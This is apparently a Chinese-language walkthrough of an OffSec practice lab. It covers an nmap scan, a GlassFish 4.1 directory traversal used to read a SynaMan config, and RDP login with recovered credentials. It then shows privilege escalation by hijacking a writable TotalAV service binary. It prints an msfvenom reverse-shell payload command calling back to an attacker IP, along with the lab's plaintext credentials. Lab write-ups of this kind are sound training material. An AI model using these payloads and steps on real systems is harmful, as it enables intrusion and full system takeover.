老样子先扫端口,发现端口服务挺多,但是实际跑了一下,有用的也就需要关注4848,6060端口,然后在这个端口探测服务中发现了两个带有版本号的服务,但是通过网上多次查询,发现只有一个关于glassfish的路径穿越的漏洞,然后这个洞差点给我带偏了
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: FISHYYY
| NetBIOS_Domain_Name: FISHYYY
| NetBIOS_Computer_Name: FISHYYY
| DNS_Domain_Name: Fishyyy
| DNS_Computer_Name: Fishyyy
| Product_Version: 10.0.19041
|_ System_Time: 2021-10-30T02:47:37+00:00
|_ssl-date: 2021-10-30T02:47:53+00:00; -3y230d00h01m19s from scanner time.
| ssl-cert: Subject: commonName=Fishyyy
| Not valid before: 2021-10-29T02:39:25
|_Not valid after: 2022-04-30T02:39:25
3700/tcp open giop
| fingerprint-strings:
| GetRequest, X11Probe:
| GIOP
| giop:
| GIOP
| (IDL:omg.org/SendingContext/CodeBase:1.0
| 169.254.159.234
| 169.254.159.234
|_ default
|_giop-info: ERROR: Script execution failed (use -d to debug)
4848/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-title: Login
5040/tcp open unknown
6060/tcp open x11?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"425-1267803922000"
| Last-Modified: Fri, 05 Mar 2010 15:45:22 GMT
| Content-Type: text/html
| Content-Length: 425
| Date: Sat, 30 Oct 2021 02:45:11 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <html>
| <head>
| <META HTTP-EQUIV="REFRESH" CONTENT="1;URL=app">
| </head>
| <body>
| <script type="text/javascript">
| <!--
| currentLocation = window.location.pathname;
if(currentLocation.charAt(currentLocation.length - 1) == "/"){
| window.location = window.location + "app";
| }else{
| window.location = window.location + "/app";
| //-->
| </script>
| Loading Administration console. Please wait...
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 403
| Cache-Control: private
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Set-Cookie: JSESSIONID=7CF36D08D2EE5F14012A2445FA6E3D4F; Path=/
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 5028
| Date: Sat, 30 Oct 2021 02:45:12 GMT
| Connection: close
| Server: Synametrics Web Server v7
| <!DOCTYPE html>
| <html>
| <head>
| <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
| <title>
| SynaMan - Synametrics File Manager - Version: 5.1 - build 1595
| </title>
| <meta NAME="Description" CONTENT="SynaMan - Synametrics File Manager" />
| <meta NAME="Keywords" CONTENT="SynaMan - Synametrics File Manager" />
| <meta http-equiv="X-UA-Compatible" content="IE=10" />
| <link rel="icon" type="image/png" href="images/favicon.png">
| <link type="text/css" rel="stylesheet" href="images/AjaxFileExplorer.css">
| <link rel="stylesheet" type="text/css"
| JavaRMI:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Length: 145
| Date: Sat, 30 Oct 2021 02:45:06 GMT
| Connection: close
| Server: Synametrics Web Server v7
|_ <html><head><title>Oops</title><body><h1>Oops</h1><p>Well, that didn't go as we had expected.</p><p>This error has been logged.</p></body></html>
7676/tcp open java-message-service Java Message Service 301
7680/tcp open pando-pub?
8080/tcp open http Sun GlassFish Open Source Edition 4.1
|_http-server-header: GlassFish Server Open Source Edition 4.1
|_http-title: Data Web
| http-methods:
|_ Potentially risky methods: PUT DELETE TRACE
8181/tcp open intermapper?
| ssl-cert: Subject: commonName=localhost/organizationName=Oracle Corporation/stateOrProvinceName=California/countryName=US
| Not valid before: 2014-08-21T13:30:10
|_Not valid after: 2024-08-18T13:30:10
|_ssl-date: TLS randomness does not represent time
8686/tcp open java-rmi Java RMI
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @169.254.159.234:8686
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
我当时看到这个漏洞,没太多想,因为跟原先的路径穿越的靶场有一点不同就是,他这个没有22端口,不知道去读啥子,然后我就去尝试爆破oracle的密码,原先探测端口的时候得到了一些用户名,但是这里大家不需要管,然后爆破一段时间后发现不行,还得回归这个漏洞,于是开始尝试路径穿越,在尝试到第五个的时候成功读到/windows/win.ini
然后在进一步的利用的时候,发现他跟其他读文件的还不同,不光可以读文件还可以读文件夹,这就很舒服了,果断回到原先探测到的两个服务的类似config文件中进行探测用户名和密码,然后这一块儿只能一个一个找,没啥捷径的挨个看就完了(我是直接看offsec的靶场介绍知道了只需要看synaman,肯定少了一些时间)
然后我们在他的一个文件中获得一个smtp的票据arthurr:KingOfAtlantis,获得票据肯定要去试一下能不能成功登录,然后我们要用这条命令去远程链接,这个链接命令相当好用
redesktop -u arthur -p KingOfAtlantis -a 16 -P -z -b -g 1860x1020 192.168.51.168
然后成功登录之后,winpeas在这个cmd窗口是无颜色的不好看,我又懒得去搞nc命令拿别的shell,由于发现该用户当前桌面存在一个totalav程序,果断使用sharpup查看一下是不是有劫持的可能性,因为铁铁你记住,这个初始靶场当前用户桌面出现任何一个可疑的程序或者文件夹都得多去注意一下,然后不出所料发现好像可以做劫持
小心一点的我们先用icacls命令要去看我们是否具有相应的权限,要不然反弹shell的程序搞上来了,无法替换就尴尬了,这里也是看到我们具备完全权限,放心搞
然后就是常规三件套,构造马子,改要劫持程序的名字,再将我们的马子改为劫持程序的名字,用到的就是move和copy命令,这里就不展示了
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.51 LPORT=3344 -f exe > SecurityService.exe
然后就是使用shutdown命令重启一下机器,最后也是成功拿到管理员权限,轻松拿下
总结:
靶场我认为需要注意的是在利用完一个服务的exp之后,还存在另一个服务的时候可以多关注一下这个服务,当然前提是像这个靶场的组合漏洞,其他就是这几个靶场做下来发现了光靠winpeas已经不太够用了,sharpup和findstr命令要多用,但是最后我还是认为这个靶场难度还算凑活,不是很难,但是适合活跃脑子。
链接:
Oracle GlassFish Server 4.1 - Directory Traversal - Multiple webapps Exploit
下面这个链接就是误导我去爆破oracle的链接,大家一定要现有自己一个构想再去执行其他exp